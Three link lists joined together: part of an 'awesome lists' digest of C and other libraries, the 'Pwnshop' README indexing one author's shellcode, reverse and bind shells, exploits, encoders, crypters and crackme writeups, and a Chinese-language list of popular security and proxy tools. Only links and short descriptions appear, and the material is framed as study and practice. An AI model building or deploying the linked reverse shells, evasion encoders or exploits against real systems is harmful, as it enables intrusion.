* [shopify (⭐94)](https://github.com/nsweeting/shopify) - Easily access the Shopify API.
### Translations and Internationalizations
* [getatrex (⭐6)](https://github.com/alexfilatov/getatrex) - Automatic translation tool of Gettext locales with Google Translate for Elixir/Phoenix projects.
## [6. Awesome C](/content/inputsh/awesome-c/README.md)
### Compilers
* [CompCert](http://compcert.inria.fr/) - Fully-verified C compiler. Supports almost all of C89. [`GNU GPL2.1 or later`](http://www.gnu.org/licenses/old-licenses/gpl-2.0.html)
* [Intel SPMD](http://ispc.github.io/) - Compiler for a variant of the C language, for single program, multiple data programming. [`Various licenses`](https://github.com/ispc/ispc/blob/master/LICENSE.txt)
### Compression
* [lz4](https://lz4.github.io/lz4/) - Fast Compression algorithm.
* [quicklz](http://www.quicklz.com/index.php) - Fast compression library. [`GNU GPL2.1`](http://www.gnu.org/licenses/old-licenses/gpl-2.0.html)
### Crypto
* [libgcrypt](https://gnupg.org/related_software/libgcrypt/) - General-purpose cryptography library, with a range of available ciphers. [`GNU LGPL2.1or later (code)`](http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html) and [`GNU GPL2.1 or later (manual and tools)`](http://www.gnu.org/licenses/old-licenses/gpl-2.0.html)
* [libsodium](https://download.libsodium.org/doc/) - Modern and easy-to-use crypto library. [`Expat`](https://directory.fsf.org/wiki/License:Expat)
* [libtomcrypt](https://www.libtom.net/) - Fairly comprehensive, modular and portable cryptographic toolkit. [`Public Domain`](https://creativecommons.org/share-your-work/public-domain/)
### Database
* [sophia](http://sophia.systems/) - Modern, embeddable key-value database. [`FreeBSD`](https://directory.fsf.org/wiki?title=License:FreeBSD)
### Editors
* [Qt Creator](https://www.qt.io/qt-features-libraries-apis-tools-and-ide/#ide) - Cross-platform IDE written with C++ and Qt, part of the Qt SDK. Supports Clang Code Model. [`GNU GPL3 with Qt exception`](https://github.com/qt-creator/qt-creator/blob/master/LICENSE.GPL3-EXCEPT)
### RTOS
* [Amazon FreeRTOS](https://aws.amazon.com/freertos/) - RTOS for microcontrollers that makes small, low-power edge devices easy to program. [`MIT`](https://github.com/aws/amazon-freertos/blob/master/LICENSE)
* [Contiki](http://www.contiki-os.org/) - Connect low-cost, low power microcontrollers to the Internet. [`3-clause BSD`](https://github.com/contiki-os/contiki/blob/master/LICENSE)
### Frameworks
* [C Algorithms](https://fragglet.github.io/c-algorithms/) - Collection of common algorithms and data structures for C. [`ISC`](https://directory.fsf.org/wiki/License:ISC)
* [EFL](https://www.enlightenment.org/) - Large collection of useful data structures and functions.
* [qlibc](http://wolkykim.github.io/qlibc/) - Simple and powerful C library, designed as a replacement for GLib while focusing on being small and light. [`qLib license`](https://github.com/wolkykim/qlibc/blob/master/LICENSE) (similar to [`FreeBSD`](https://directory.fsf.org/wiki?title=License:FreeBSD))
### Engines
* [ioquake3](https://ioquake3.org/) - The Quake3 engine, freed at last. [`GNU GPL2.1`](http://www.gnu.org/licenses/old-licenses/gpl-2.0.html)
* [Orx](http://orx-project.org/) - Portable, lightweight, plugin-based, data-driven, 2D-oriented game engine. [`zlib`](https://directory.fsf.org/wiki/License:Zlib)
### Resources
* [Chipmunk2D](http://chipmunk-physics.net/) - Fast and lightweight 2D game physics library. [`Expat`](https://directory.fsf.org/wiki/License:Expat)
* [FreeGLUT](http://freeglut.sourceforge.net/) - Alternative to the OpenGL Utility Toolkit. Allows the creation and management of windows with OpenGL contexts. [`X11`](https://directory.fsf.org/wiki/License:X11)
* [libao](https://xiph.org/ao/) - Cross-platform audio library with a wide variety of outputs. [`GNU GPL2.1 or later`](http://www.gnu.org/licenses/old-licenses/gpl-2.0.html)
* [SDL and SDL2](https://www.libsdl.org/) - Cross-platform development library designed to provide low-level access to audio, keyboard, mouse, joystick and graphics hardware via OpenGL. SDL2 is the most current version. [`zlib`](https://directory.fsf.org/wiki/License:Zlib)
### Generic Programming
* [klib](http://attractivechaos.github.io/klib/#About) - Small and lightweight implementations of common algorithms and data structures. [`MIT`](https://en.wikipedia.org/wiki/MIT_License)
### JSON
* [WJElement (⭐101)](https://github.com/netmail-open/wjelement/wiki) - Advanced JSON manipulation library, with support for JSON Schema. [`LGPL, any version`](https://github.com/netmail-open/wjelement/)
### Memory Allocators / Language Standards
* [jemalloc](http://jemalloc.net/) - General purpose malloc(3) implementation that emphasizes fragmentation avoidance and scalable concurrency support, commonly used in production systems. [`FreeBSD`](https://directory.fsf.org/wiki?title=License:FreeBSD)
### Multimedia / Language Standards
* [libmpv](https://mpv.io/) - Music-playing library. Compile with `./waf configure --disable-cplayer --enable-libmpv-shared` to not have the music player. [`GNU GPL2.1 or later`](http://www.gnu.org/licenses/old-licenses/gpl-2.0.html)
* [libsoundio](http://libsound.io/) - Library for cross-platform, real-time audio input and output. Has a range of back-ends. [`Expat`](https://directory.fsf.org/wiki/License:Expat)
### Networking and Internet / Language Standards
* [czmq](http://czmq.zeromq.org/) - High-level binding for ZeroMQ. [`MPL2.0`](https://www.gnu.org/licenses/license-list.html#MPL-2.0)
* [libuv](http://libuv.org/) - Cross-platform asynchronous I/O. [`Expat`](https://directory.fsf.org/wiki/License:Expat)
* [lwan](https://lwan.ws/) - Experimental, scalable, high-performance HTTP server. [`GNU GPL2.1`](http://www.gnu.org/licenses/old-licenses/gpl-2.0.html)
* [mongoose](https://cesanta.com/) - Embedded web server for C. [`GNU GPL2.1`](http://www.gnu.org/licenses/old-licenses/gpl-2.0.html)
### Web Frameworks / Language Standards
* [balde](https://balde.rgm.io/) - Microframework for C based on GLib. [`GNU LGPLv2.1`](http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html)
* [kore](https://kore.io/) - Easy to use, scalable and secure web application framework for writing web APIs in C.
* [klone](http://www.koanlogic.com/klone/) - KLone is a fully-featured, multiplatform, web application development framework.
### Numerical / Language Standards
* [apophenia](http://apophenia.info/) - Library for statistical and scientific computing. [`GNU GPL2.1`](http://www.gnu.org/licenses/old-licenses/gpl-2.0.html)
### Parallel Programming / Language Standards
* [ck](http://concurrencykit.org/) - Concurrency primitives, safe memory reclamation mechanisms and non-blocking data structures. [`FreeBSD`](https://directory.fsf.org/wiki?title=License:FreeBSD)
* [libdill](http://libdill.org/) - Structured concurrency in C. [`X11`](https://directory.fsf.org/wiki/License:X11)
### String Manipulation / Language Standards
* [shoco](http://ed-von-schleck.github.io/shoco/) - Compressor for small text strings. [`Expat`](https://directory.fsf.org/wiki/License:Expat)
### Testing / Language Standards
* [CHEAT](http://users.jyu.fi/\~sapekiis/cheat/) - Very simple unit testing framework. [`FreeBSD`](https://directory.fsf.org/wiki?title=License:FreeBSD)
* [CMock](http://www.throwtheswitch.org/) - Mock/stub generator for C. [`Expat`](https://directory.fsf.org/wiki/License:Expat)
* [Unity](http://www.throwtheswitch.org/) - Simple unit testing framework for C. [`Expat`](https://directory.fsf.org/wiki/License:Expat)
### Tools / Language Standards
* [rr](https://rr-project.org/) - Debugger that records non-deterministic executions to allow for deterministic debugging. [`FreeBSD`](https://directory.fsf.org/wiki?title=License:FreeBSD)
### Utilities / Language Standards
* [libusb](https://libusb.info/) - Generic access to USB devices. [`LGPL2.1`](https://github.com/libusb/libusb/blob/master/COPYING)
## [7. Awesome Swift](/content/matteocrippa/awesome-swift/README.md)
### Core Data
* [SugarRecord (⭐2.1k)](https://github.com/modo-studio/SugarRecord) - Helps with Core Data and Realm.
### Transition / Barcode
* [EasyTransitions (⭐1.7k)](https://github.com/marcosgriselli/EasyTransitions) - A simple way to create custom interactive UIViewController transitions.
## [8. Awesome PICO 8](/content/pico-8/awesome-PICO-8/README.md)
### Contents / Tools
* [MIDI to PICO-8 (⭐57)](https://github.com/andmatand/midi-to-pico8) - A tool to convert MIDI files to PICO-8 music.
## [9. Awesome Hacking](/content/carpedm20/awesome-hacking/README.md)
### Tools / Other
* [Autopsy](http://www.sleuthkit.org/autopsy/) - A digital forensics platform and graphical interface to [The Sleuth Kit](http://www.sleuthkit.org/sleuthkit/index.php) and other digital forensics tools
### Bug bounty / Other
* [Awesome bug bounty resources by EdOverflow (⭐4.5k)](https://github.com/EdOverflow/bugbounty-cheatsheet)
### General / Other
* [Movies For Hackers (⭐9.3k)](https://github.com/k4m4/movies-for-hackers) - A curated list of movies every hacker & cyberpunk must watch.
---
- Prev: [May 12, 2018](/content/2018/05/12/README.md)
- Next: [May 10, 2018](/content/2018/05/10/README.md) |
# Pwnshop
> Reverse Engineering, Exploitation & Crypto.
Check out my [blog](http://medium.syscall59.com), follow me on [Twitter](https://twitter.com/syscall59) and [Youtube](https://www.youtube.com/channel/UC2lZwxYDEAgQod3D4JqxLfg)!
### Support the project :
<a href="https://www.buymeacoffee.com/syscall59" target="_blank"><img src="https://bmc-cdn.nyc3.digitaloceanspaces.com/BMC-button-images/custom_images/orange_img.png" alt="Buy Me A Coffee" style="height: auto !important;width: auto !important;" ></a>
## Contents:
- Reverse engineering a simple crackme called “Just see”: [writeup](https://medium.com/@0x0FFB347/crackme-just-see-c6dda1edb9fb)
- Reverse engineering a level 1 crackme "Easy_firstCrackme-by-D4RK_FL0W": [writeup](https://medium.com/syscall59/reverse-engineering-easy-firstcrackme-by-d4rk-fl0w-73dd4412bca5?source=your_stories_page---------------------------)
- Utility - Object/Executable file to shellcode converter script: [code](https://github.com/alanvivona/pwnshop/blob/master/utils/obj2shellcode)
- Utility - Assembly and link script : [code](https://github.com/alanvivona/pwnshop/blob/master/utils/asm-and-link)
- Utility - Shellcode testing skeleton generator : [code](https://github.com/alanvivona/pwnshop/blob/master/utils/gen-shellcode-test)
- Utility - GDB python script template : [code](https://github.com/alanvivona/pwnshop/blob/master/utils/gdb-script-template.py)
- Exit syscall asm: [code](https://github.com/alanvivona/pwnshop/blob/master/src/0x00-calling-exit-syscall/0x00-exitSyscall.asm)
- Write syscall "Hello world!": [code](https://github.com/alanvivona/pwnshop/blob/master/src/0x01-calling-write-syscall/0x01-calling-write-syscall.asm)
- Execve shellcode (dynamic addressing) [code](https://github.com/alanvivona/pwnshop/blob/master/src/0x02-execve-dynamic-addressing/0x02-dynamic-addressing.asm)
- Ret2libc exploit for protostar stack6 challenge : [code](https://github.com/alanvivona/pwnshop/blob/master/src/0x03-system-for-ret2libc/pwn.py)
- Exploit for protostar stack7 challenge (Smallest ROP chain): [code](https://github.com/alanvivona/pwnshop/blob/master/src/0x04-simplest-rop-ever/roppwn.py)
- Exploit for VUPlayer 2.49 (no DEP) local buffer overflow: [code](https://github.com/alanvivona/pwnshop/blob/master/src/0x07-windows-EDBID-40018-localbof/exploit.js), [writeup](https://medium.com/@0x0FFB347/windows-expliot-dev-101-e5311ac284a)
- Execve shellcode (stack method) : [code](https://github.com/alanvivona/pwnshop/blob/master/src/0x0A-execve-stack/execvestack.nasm)
- Execve shellcode using RIP relative addressing [code](https://github.com/alanvivona/pwnshop/blob/master/src/0x0B-execve-rip-relative-addressing/execve-rip-relative.nasm)
- Password Protected Bind Shell (Linux/x64) [code](https://github.com/alanvivona/pwnshop/blob/master/src/0x0D-SLAE64-1-tcp-bind-shell-auth/tcp-bind-shell-auth-smaller.nasm), [writeup](https://medium.com/bugbountywriteup/writing-a-password-protected-bind-shell-linux-x64-e052d2f65ff2)
- Password Protected Reverse Shell (Linux/x64) [code](https://github.com/alanvivona/pwnshop/blob/master/src/0x0E-SLAE64-2-reverse-tcp-auth/reverse-tcp-with-auth.nasm), [writeup](https://medium.com/@0x0FFB347/writing-a-password-protected-reverse-shell-linux-x64-5f4d3a28d91a), [Featured in the 1st number of Paged-Out](https://pagedout.institute/download/PagedOut_001_beta1.pdf)
- XANAX - A custom shellcode encoder written in assembly :
- [encoder code](https://github.com/alanvivona/pwnshop/blob/master/src/0x10-SLAE64-4-custom-encoder/xanax-encoder.nasm)
- [encoder on exploit-db](https://www.exploit-db.com/shellcodes/46679)
- [encoder on packetstormsecurity](https://packetstormsecurity.com/files/152456/Linux-x64-XANAX-Encoder-Shellcode.html)
- [decoder code](https://github.com/alanvivona/pwnshop/blob/master/src/0x10-SLAE64-4-custom-encoder/xanax-decoder.nasm)
- [decoder on exploit-db](https://www.exploit-db.com/shellcodes/46680)
- [decoder on packetstormsecurity](https://packetstormsecurity.com/files/152455/Linux-x64-XANAX-Decoder-Shellcode.html)
- [writeup](https://medium.com/@0x0FFB347/writing-a-custom-shellcode-encoder-31816e767611)
- A more generic (and somewhat extensible) encoder skeleton written in Go [code](https://github.com/alanvivona/pwnshop/blob/master/src/0x10-SLAE64-4-custom-encoder/encoder.go)
- Gocryper : A custom AES shellcode crypter written in Go [code](https://github.com/alanvivona/pwnshop/tree/master/src/0x14-SLAE64-crypter), [writeup](https://medium.com/syscall59/a-trinity-of-shellcode-aes-go-f6cec854f992)
- A basic Polimorphic Engine written in Go [code](https://github.com/alanvivona/pwnshop/tree/master/src/0x12-SLAE-shellstorm-polymorph), [writeup](https://medium.com/me/stats/post/73ec56a2353e)
- Egg-hunter shellcode (Linux/x64) [code](https://github.com/alanvivona/pwnshop/blob/master/src/0x0F-SLAE64-3-egghunter/egghunter-V1.nasm), [writeup](https://medium.com/syscall59/on-eggs-and-egg-hunters-linux-x64-305b947f792e)
- Password Protected Reverse Shell (Linux/ARMv6)
- [code](https://github.com/alanvivona/pwnshop/blob/master/src/0x15-ARM-shellcode/ARM-reverse-shell-with-auth.s)
- [writeup](https://medium.com/syscall59/shellcode-for-iot-a-password-protected-reverse-shell-linux-arm-a18fcda4853b)
- [payload on packetstormsecurity](https://packetstormsecurity.com/files/152602/Linux-ARM-Password-Protected-Reverse-TCP-Shell-Shellcode.html)
- [payload on exploit-db](https://www.exploit-db.com/shellcodes/46736)
- MalwareTech's String Challenges crackmes: [writeup](https://medium.com/syscall59/solving-malwaretech-string-challenges-with-some-radare2-magic-98ebd8ff0b88)
- MalwareTech's Shellcode Challenges crackmes: [writeup](http://medium.syscall59.com/solving-malwaretech-shellcode-challenges-with-some-radare2-magic-b91c85babe4b)
- DEFCON Qualys 2019 : Speedrun-001 exploit (Stack-based bof + ROP): [code](https://github.com/alanvivona/pwnshop/blob/master/src/0x17-defcon-qualys-2019/speedrun-001-exploit.py)
- Solution for the crackme "Crackme2-be-D4RK_FL0W" [writeup](https://medium.com/syscall59/reverse-engineering-crackme2-be-d4rk-fl0w-walkthrough-ea50b851b5f0)
- Solution for the crackme "Crack3-by-D4RK_FL0W" :
- Option 1 - Using r2 macros to extract the PIN: [code](https://github.com/alanvivona/pwnshop/blob/master/src/0x19-crackme-darkflow-3/r2.commands)
- Option 2 - Using GEF and unicorn-engine emulation to bruteforce the PIN: [code](https://github.com/alanvivona/pwnshop/blob/master/src/0x19-crackme-darkflow-3/emu.py)
- Blog post exploring both options: [writeup](https://medium.com/syscall59/re-using-macros-emulation-voodo-to-solve-a-crackme-a90566e9c7c9)
- Utility - r2frida Cheatsheet: [writeup](https://github.com/alanvivona/pwnshop/blob/master/utils/r2frida-cheatsheet.md)
- Solution for the crackme "alien_bin" [writeup](https://medium.com/syscall59/reverse-engineering-cracking-alien-technology-7acddcb561b)
- Automated solutions for the crackme "mexican": [writeup](https://medium.com/syscall59/solved-solving-mexican-crackme-82d71a28e189), [script solution 1: carving](https://github.com/alanvivona/pwnshop/blob/master/src/0x1A/s1-static-extract-from-code.py), [script solution 2: patching](https://github.com/alanvivona/pwnshop/blob/master/src/0x1A/s2-binary-patching.py)
- Writeup for the crackme "crackme_by_coulomb" (.net): [writeup](https://medium.com/syscall59/reverse-engineering-solving-my-first-net-crackme-dacf2e59ad3b)
- Writeup for the crackme "shadows_registerme" (.net): [writeup](https://medium.com/syscall59/reverse-engineering-and-cracking-a-net-binary-using-dnspy-4b88c692a6ff)
- Writeup for the crackme "removemytrial_by_coulomb" (.net): [writeup](https://medium.com/bugbountywriteup/reverse-engineering-beating-a-trial-on-a-net-crackme-d4ab6604f10b)
- Writeup for the crackme "Get The Password": [writeup](https://medium.com/bugbountywriteup/writing-a-keygen-using-python-itertools-1944cbb4d07c), [code (keygen)](https://github.com/alanvivona/pwnshop/blob/master/src/0x1C-HN1-Crackme1-GetThePassword/solve.py)
- Cyptopals Solutions: Set 1, Challenge 1. "Convert hex to base64":
[code](https://github.com/alanvivona/pwnshop/blob/master/src/0x1D-cryptopals-se1-ch1/)
- Cyptopals Solutions: Set 1, Challenge 2. "Fixed XOR":
[code](https://github.com/alanvivona/pwnshop/blob/master/src/0x1E-cryptopals-se1-ch2/)
- Cyptopals Solutions: Set 1, Challenge 3. "Single-byte XOR cipher":
[code](https://github.com/alanvivona/pwnshop/blob/master/src/0x1F-cryptopals-se1-ch3/)
- Cyptopals Solutions: Set 1, Challenge 4. "Detect single-character XOR":
[code](https://github.com/alanvivona/pwnshop/blob/master/src/0x20-cryptopals-se1-ch4/)
- Cyptopals Solutions: Set 1, Challenge 5. "Implement repeating-key XOR":
[code](https://github.com/alanvivona/pwnshop/blob/master/src/0x21-cryptopals-se1-ch5/)
- Cyptopals Solutions: Set 1, Challenge 6. "Break repeating-key XOR":
[code](https://github.com/alanvivona/pwnshop/blob/master/src/0x22-cryptopals-se1-ch6/)
- Cyptopals Solutions: Set 1, Challenge 7. "AES in ECB mode":
[code](https://github.com/alanvivona/pwnshop/blob/master/src/0x23-cryptopals-se1-ch7/)
- Cyptopals Solutions: Set 1, Challenge 8. "Detect AES in ECB mode":
[code](https://github.com/alanvivona/pwnshop/blob/master/src/0x24-cryptopals-se1-ch8/)
- Cyptopals Solutions: Set 2, Challenge 9. "Implement PKCS#7 padding":
[code](https://github.com/alanvivona/pwnshop/blob/master/src/0x25-cryptopals-se2-ch9/)
- Cyptopals Solutions: Set 2, Challenge 15. "PKCS#7 padding validation":
[code](https://github.com/alanvivona/pwnshop/blob/master/src/0x26-cryptopals-se2-ch15/)
## Useful links:
### Tools:
A non-exhaustive list of tools
- [radare2](https://rada.re) (+[Cutter](https://github.com/radareorg/cutter) +[r2frida](https://github.com/nowsecure/r2frida) +[r2pipe](https://github.com/radare/radare2-r2pipe) +[r2ghidra-dec](https://github.com/radareorg/r2ghidra-dec))
- [Ghidra](https://ghidra-sre.org/)
- [x64dbg](https://x64dbg.com)
- [Frida](https://www.frida.re/)
- [gdb](https://www.gnu.org/software/gdb/) (+[gdb-dashboard](https://github.com/cyrus-and/gdb-dashboard) +[GEF](https://github.com/hugsy/gef))
- [Valgrind](http://www.valgrind.org/)
- [Pwntools](http://pwntools.com)
- [Wireshark](https://www.wireshark.org/)
- [Binwalk](https://github.com/ReFirmLabs/binwalk)
- strace
- ltrace
- hexdump
- xxd
- [rappel](https://github.com/yrp604/rappel)
- nasm
- gas
- [Unicorn Engine](https://www.unicorn-engine.org/)
- [IDA](https://www.hex-rays.com/products/ida/index.shtml)
- hexedit
- bless
- Metasploit (https://www.metasploit.com/)
### Resources:
There's a **LOT** of stuff out there. These are just the most useful things I've found so far.
- :computer: [Live overflow](https://liveoverflow.com/)
- :book: [The shellcoder's handbook](https://amzn.to/2LXi0KH)
- :computer: [Exploit education](https://exploit.education/)
- :computer: [Gynvael coldwind](https://gynvael.coldwind.pl/)
- :computer: [Azeria labs](https://azeria-labs.com/)
- :computer: [Phrack](http://phrack.org/)
- :computer: [Corelan](https://www.corelan.be/index.php/articles/)
- :computer: [Fuzzysecurity](https://www.fuzzysecurity.com/index.html)
- :computer: [Packetstormsecurity](https://packetstormsecurity.com/)
- :computer: [Exploitdb](https://www.exploit-db.com/)
- :book: [Beginners RE](https://beginners.re/)
- :book: [Practical reverse engineering](https://amzn.to/35lKNQy)
- :book: [Programming linux anti-reversing techniques](https://leanpub.com/anti-reverse-engineering-linux)
- :book: [Attacking network protocols](https://amzn.to/35jFO2S)
- :book: [Penetration testing: A Hands-On introduction to hacking](https://amzn.to/2IzzlHy)
- :computer: [Malware Unicorn](https://malwareunicorn.org/#/workshops)
- :book: [Radare2 Book](https://radare.gitbooks.io/radare2book/)
- :computer: [Paged-Out!](https://pagedout.institute)
- :book: [PoC||GTFO I](https://amzn.to/2MDgz3l)
- :book: [PoC||GTFO II](https://amzn.to/2AS4uBP)
- :book: [The IDA Pro Book](https://amzn.to/2LXnKUE)
- :book: [Hacker Disassembling Uncovered](https://amzn.to/2nLew4I)
- :computer: [Reverse Engineering Stackexchange](https://reverseengineering.stackexchange.com/)
- :computer: [Cryptopals Challenges](https://cryptopals.com/)
- :book: [Cryptool Book](https://www.cryptool.org/images/ctp/documents/CT-Book-en.pdf)
- :book: [Crypto 101](https://github.com/crypto101/crypto101.github.io/raw/master/Crypto101.pdf)
- :book: [Cracking Codes With Python](http://inventwithpython.com/cracking/)
|
# [所有收集类项目](https://github.com/alphaSeclab/all-my-collection-repos)
# 说明
- [English Version](https://github.com/alphaSeclab/sec-tool-list/blob/master/Readme_en.md)
- 因Github Readme显示行数有限, 当前页面显示的为不完整版, 只显示了星数最高的前1000个工具. [点击查看完整版](https://github.com/alphaSeclab/sec-tool-list/blob/master/Readme_full.md)
# 工具列表
- [**70102**星][10d] [JS] [trekhleb/javascript-algorithms](https://github.com/trekhleb/javascript-algorithms) JavaScript算法和数据结构
- [**66889**星][3m] [Py] [thealgorithms/python](https://github.com/thealgorithms/python) Python实现的所有算法
- [**61315**星][10d] [JS] [puppeteer/puppeteer](https://github.com/puppeteer/puppeteer) Headless Chrome Node.js API
- [**49304**星][10d] [C#] [shadowsocks/shadowsocks-windows](https://github.com/shadowsocks/shadowsocks-windows) Shadowsocks的Windows客户端
- [**37096**星][10d] [Py] [scrapy/scrapy](https://github.com/scrapy/scrapy) Web爬虫框架
- [**35937**星][10d] [Py] [minimaxir/big-list-of-naughty-strings](https://github.com/minimaxir/big-list-of-naughty-strings) “淘气”的字符串列表,当作为用户输入时很容易引发问题
- [**35780**星][10d] [Go] [fatedier/frp](https://github.com/fatedier/frp) 快速的反向代理, 将NAT或防火墙之后的本地服务器暴露到公网
- [**35435**星][8m] [hack-with-github/awesome-hacking](https://github.com/hack-with-github/awesome-hacking) A collection of various awesome lists for hackers, pentesters and security researchers
- [**35073**星][7d] [C++] [x64dbg/x64dbg](https://github.com/x64dbg/x64dbg) Windows平台x32/x64调试器
- [**32627**星][10d] [Py] [shadowsocks/shadowsocks](https://github.com/shadowsocks/shadowsocks) shadowsocks原版
- [**32301**星][10d] [trimstray/the-book-of-secret-knowledge](https://github.com/trimstray/the-book-of-secret-knowledge) A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools and more.
- [**31373**星][7d] [Go] [v2ray/v2ray-core](https://github.com/v2ray/v2ray-core) A platform for building proxies to bypass network restrictions.
- [**29641**星][10d] [Kotlin] [shadowsocks/shadowsocks-android](https://github.com/shadowsocks/shadowsocks-android) A shadowsocks client for Android
- [**28802**星][2m] [JS] [algorithm-visualizer/algorithm-visualizer](https://github.com/algorithm-visualizer/algorithm-visualizer) an interactive online platform that visualizes algorithms from code.
- [**26685**星][10d] [Py] [certbot/certbot](https://github.com/certbot/certbot) Certbot is EFF's tool to obtain certs from Let's Encrypt and (optionally) auto-enable HTTPS on your server. It can also act as a client for any other CA that uses the ACME protocol.
- [**26685**星][10d] [Py] [certbot/certbot](https://github.com/certbot/certbot) 从Let's Encrypt获得证书,并(可选地)在服务器上自动启用HTTPS。它还可以充当使用ACME协议的任何其他CA的客户端
- [**26594**星][1y] [Py] [imhuay/algorithm_interview_notes-chinese](https://github.com/imhuay/algorithm_interview_notes-chinese) 2018/2019/校招/春招/秋招/算法/机器学习(Machine Learning)/深度学习(Deep Learning)/自然语言处理(NLP)/C/C++/Python/面试笔记
- [**26576**星][6m] [Swift] [shadowsocks/shadowsocksx-ng](https://github.com/shadowsocks/shadowsocksx-ng) Next Generation of ShadowsocksX
- [**26238**星][10d] [xitu/gold-miner](https://github.com/xitu/gold-miner) 翻译优质互联网技术文章的社区
- [**24073**星][10d] [Go] [filosottile/mkcert](https://github.com/filosottile/mkcert) 一个简单的零配置工具,可以使用任何名称创建本地受信任的开发证书
- [**23690**星][10d] [alvin9999/new-pac](https://github.com/alvin9999/new-pac) 科学上网/自由上网/翻墙/软件/方法,免费shadowsocks/ss/ssr/v2ray/goflyway账号,vps一键搭建脚本/教程
- [**22908**星][4m] [PHP] [danielmiessler/seclists](https://github.com/danielmiessler/seclists) 多种类型资源收集:用户名、密码、URL、敏感数据类型、Fuzzing Payload、WebShell等
- [**22862**星][10d] [Swift] [raywenderlich/swift-algorithm-club](https://github.com/raywenderlich/swift-algorithm-club) 算法和数据结构,Swift版,带解释
- [**22521**星][10d] [Rust] [alacritty/alacritty](https://github.com/alacritty/alacritty) A cross-platform, GPU-accelerated terminal emulator
- [**22161**星][10d] [Java] [skylot/jadx](https://github.com/skylot/jadx) dex 转 java 的反编译器
- [**21446**星][3m] [Java] [thealgorithms/java](https://github.com/thealgorithms/java) Java实现的所有算法
- [**21055**星][10d] [Java] [alibaba/arthas](https://github.com/alibaba/arthas) Alibaba Java诊断利器Arthas
- [**21039**星][10d] [Shell] [streisandeffect/streisand](https://github.com/StreisandEffect/streisand) Streisand sets up a new server running your choice of WireGuard, OpenConnect, OpenSSH, OpenVPN, Shadowsocks, sslh, Stunnel, or a Tor bridge. It also generates custom instructions for all of these services. At the end of the run you are given an HTML file with instructions that can be shared with friends, family members, and fellow activists.
- [**20823**星][10d] [C++] [cmderdev/cmder](https://github.com/cmderdev/cmder) Lovely console emulator package for Windows
- [**20797**星][10d] [Java] [nationalsecurityagency/ghidra](https://github.com/nationalsecurityagency/ghidra) 软件逆向框架
- [**20360**星][3m] [Jupyter Notebook] [camdavidsonpilon/probabilistic-programming-and-bayesian-methods-for-hackers](https://github.com/camdavidsonpilon/probabilistic-programming-and-bayesian-methods-for-hackers) An introduction to Bayesian methods + probabilistic programming with a computation/understanding-first, mathematics-second point of view. All in pure Python ;)
- [**19944**星][10d] [Haskell] [koalaman/shellcheck](https://github.com/koalaman/shellcheck) bash/sh脚本静态检测工具, 给出警告和建议
- [**19824**星][10d] [Py] [donnemartin/interactive-coding-challenges](https://github.com/donnemartin/interactive-coding-challenges) 120+ interactive Python coding interview challenges (algorithms and data structures). Includes Anki flashcards.
- [**19635**星][10d] [TS] [railsware/upterm](https://github.com/railsware/upterm) A terminal emulator for the 21st century.
- [**19574**星][4m] [Ruby] [rapid7/metasploit-framework](https://github.com/rapid7/metasploit-framework) Metasploit Framework
- [**19324**星][10d] [Vue] [liyasthomas/postwoman](https://github.com/liyasthomas/postwoman) Web 请求构建工具(相当于Postman)
- [**19002**星][10d] [fallibleinc/security-guide-for-developers](https://github.com/fallibleinc/security-guide-for-developers) Security Guide for Developers (实用性开发人员安全须知)
- [**18747**星][10d] [Py] [mitmproxy/mitmproxy](https://github.com/mitmproxy/mitmproxy) An interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.
- [**18582**星][10d] [Go] [inconshreveable/ngrok](https://github.com/inconshreveable/ngrok) 反向代理,在公网终端和本地服务之间创建安全的隧道
- [**18223**星][10d] [Py] [trailofbits/algo](https://github.com/trailofbits/algo) Ansible 脚本(基于Python),简化配置私人 IPSEC VPN 的过程,默认使用最安全的配置,支持常见云提供商,并且大多数设备都不需要客户端
- [**17366**星][7d] [Py] [corentinj/real-time-voice-cloning](https://github.com/corentinj/real-time-voice-cloning) Clone a voice in 5 seconds to generate arbitrary speech in real-time
- [**17309**星][10d] [Py] [keon/algorithms](https://github.com/keon/algorithms) Python数据结构和算法示例
- [**17131**星][10d] [Py] [sqlmapproject/sqlmap](https://github.com/sqlmapproject/sqlmap) 自动SQL注入和数据库接管工具
- [**17119**星][10d] [C] [curl/curl](https://github.com/curl/curl) 命令行工具和库,使用URL语法传输数据,支持HTTP,HTTPS,FTP,FTPS,GOPHER,TFTP,SCP,SFTP,SMB,TELNET,DICT,LDAP,LDAPS,FILE,IMAP,SMTP,POP3,RTSP和RTMP。libcurl提供了许多强大的功能
- [**16898**星][10d] [C] [bannedbook/fanqiang](https://github.com/bannedbook/fanqiang) 翻墙-科学上网
- [**16311**星][10d] [gfwlist/gfwlist](https://github.com/gfwlist/gfwlist) gfwlist
- [**15960**星][3m] [micropoor/micro8](https://github.com/micropoor/micro8) 从业10年渗透笔记
- [**15811**星][10d] [Py] [drduh/macos-security-and-privacy-guide](https://github.com/drduh/macOS-Security-and-Privacy-Guide) Guide to securing and improving privacy on macOS
- [**15415**星][7m] [Py] [eriklindernoren/ml-from-scratch](https://github.com/eriklindernoren/ml-from-scratch) Machine Learning From Scratch. Bare bones NumPy implementations of machine learning models and algorithms with a focus on accessibility. Aims to cover everything from linear regression to deep learning.
- [**15003**星][10d] [Java] [tencent/tinker](https://github.com/tencent/tinker) 一个针对Android的热修复解决方案库,它支持dex、库和资源更新,无需重新安装apk
- [**14431**星][10d] [C#] [0xd4d/dnspy](https://github.com/0xd4d/dnspy) .NET调试器和汇编编辑器
- [**14062**星][6m] [Py] [binux/pyspider](https://github.com/binux/pyspider) Python网络爬虫系统
- [**13549**星][10d] [Shell] [hwdsl2/setup-ipsec-vpn](https://github.com/hwdsl2/setup-ipsec-vpn) Scripts to build your own IPsec VPN server, with IPsec/L2TP and Cisco IPsec on Ubuntu, Debian and CentOS
- [**13544**星][10d] [getlantern/download](https://github.com/getlantern/download) Lantern官方版本下载 蓝灯 翻墙 代理 科学上网 外网 加速器 梯子 路由 proxy vpn circumvention gfw
- [**13193**星][3m] [Py] [cool-rr/pysnooper](https://github.com/cool-rr/pysnooper) Never use print for debugging again
- [**13072**星][7d] [Java] [signalapp/signal-android](https://github.com/signalapp/Signal-Android) A private messenger for Android.
- [**13063**星][10d] [Java] [signalapp/signal-android](https://github.com/signalapp/Signal-Android) A private messenger for Android.
- [**13030**星][4m] [C] [shadowsocks/shadowsocks-libev](https://github.com/shadowsocks/shadowsocks-libev) libev port of shadowsocks
